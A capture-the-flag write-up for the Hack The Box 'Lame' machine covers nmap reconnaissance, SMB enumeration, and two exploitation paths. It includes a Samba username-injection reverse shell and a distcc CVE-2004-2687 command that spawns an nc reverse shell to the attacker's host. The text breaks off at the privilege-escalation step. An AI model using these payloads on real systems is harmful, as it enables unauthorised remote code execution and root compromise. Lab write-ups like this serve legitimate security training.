Lame Writeup

https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/linux-boxes/lame-writeup-w-o-metasploit

Reconnaissance:

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV -O 10.10.10.3  
-sC: run default nmap scripts
-sV: detect service version
-O: detect OS
-oA: output all formats and store in file nmap/initial

We get back the following result showing that these ports are open:

  • Port 21: running File Transfer Protocol (FTP) version 2.3.4. This allows anonymous login so we should keep that in mind.

  • Port 22: running OpenSSH version 4.7p1.

  • Ports 139 and 445: are running Samba v3.0.20-Debian.

Before we start investigating these ports, let’s run more comprehensive nmap scans in the background to make sure we cover all bases.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p- 10.10.10.3

We have a new port that did not show up in the initial scan.

  • Port 3632: running the distributed compiler daemon distcc version 1.

Similarly, we run an nmap scan with the -sU flag enabled to run a UDP scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O -p- 10.10.10.3

We get back the following result. As can be seen, all ports are either filtered or closed. Our initial recon shows that we potentially have four different points of entry to this machine.

Enumeration:

Let’s enumerate more to determine if any of these services are either misconfigured or running vulnerable versions.

Port 21 vsftpd v2.3.4

A quick google search shows us that this version is famously vulnerable to a backdoor command execution that is triggered by entering a string that contains the characters “:)” as the username. When the backdoor is triggered, the target machine opens a shell on port 6200. This exploit is simple enough to exploit manually but we’re trying to move to more automation so let’s see if there is an nmap script that already checks for that

┌──(kali㉿kali)-[~]
└─$ ls /usr/share/nmap/scripts/ftp*

Execute the script on port 21 of the target machine.

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap --script ftp-vsftpd-backdoor -p 21 10.10.10.3

The script output shows that we’re not vulnerable to this vulnerability. Let’s move on to our second point of entry.

Port 22 OpenSSH v4.7p1

After a quick google search, nothing major pops up. Nmap contains multiple scripts that can brute force credentials amongst other things.

┌──(kali㉿kali)-[~]
└─$ ls /usr/share/nmap/scripts/ssh*

This might take a while and could potentially lead us nowhere so we’ll put this on the back burner and get back to it later if the other points of entry don’t pan out.

Ports 139 and 445 Samba v3.0.20-Debian

I have high hopes to gain at least an initial foothold using these ports. Let’s use smbclient to access the SMB server.

┌──(kali㉿kali)-[~]
└─$ smbclient -L 10.10.10.3
-L: lists what services are available on a server

Anonymous login is allowed.

Let’s view the permissions on the share drives.

┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.10.3
-H: IP of host

We get back the following result. Interesting! We have READ/WRITE access on the tmp folder.

Let’s go back to our google friend to see if this version of Samba is vulnerable.

We’re looking for a code execution vulnerability that would ideally give us Admin access. After going through all the code execution vulnerabilities, the simplest one that won’t require me to use Metasploit is

The issue seems to be with the username field. If we send shell metacharacters into the username we exploit a vulnerability which allows us to execute arbitrary commands.

exploitdb uses Metasploit, reading through the code tells us that all the script is doing is running the following command, where “payload.encoded” would be a reverse shell sent back to our attack machine.

"/=`nohup " + payload.encoded + "`"

Before we exploit this, let’s look at our last point of entry.

Port 3632 distcc v1

Googling “distcc v1” reveals that this service is vulnerable to a remote code execution and there’s an nmap script that can verify that.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script distcc-cve2004-2687 -p 3632 10.10.10.3

So we have two potential ways to exploit this machine.

Exploitation #1: Samba

Add a listener on attack machine.

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444

Log into the smb client.

┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.10.10.3/tmp
Anonymous login

As mentioned in the previous section, we’ll send shell metacharacters into the username with a reverse shell payload.

logon "/=`nohup nc -nv 10.10.16.6 4444 -e /bin/sh`"
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.3] 55202

id
uid=0(root) gid=0(root)
whoami
root

The shell connects back to our attack machine and we have root! In this scenario, we didn’t need to escalate privileges.

Grab the user flag.

cat /home/makis/user.txt

Grab the root flag

cat /root/root.txt

Exploitation #2: Distcc

In the previous section, we saw that this service is vulnerable to CVE 2004–2687 and there’s an nmap script that can be used to exploit this vulnerability and run arbitrary commands on the target machine.

First, start a listener on the attack machine.

nc -nlvp 4444

Then, use the nmap script to send a reverse shell back to the attack machine.

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.6 4444 -e /bin/bash'"

The shell connects back to our attack machine and we have a non privileged shell!

We’ll need to escalate privileges. Google the OS version — Linux 2.6.24 to see if it is vulnerable to any exploits. I tried but they didn’t work

Let’s try. Download the exploit from searchsploit:

PreviousTIER: 2NextBrainfuck Writeup

Last updated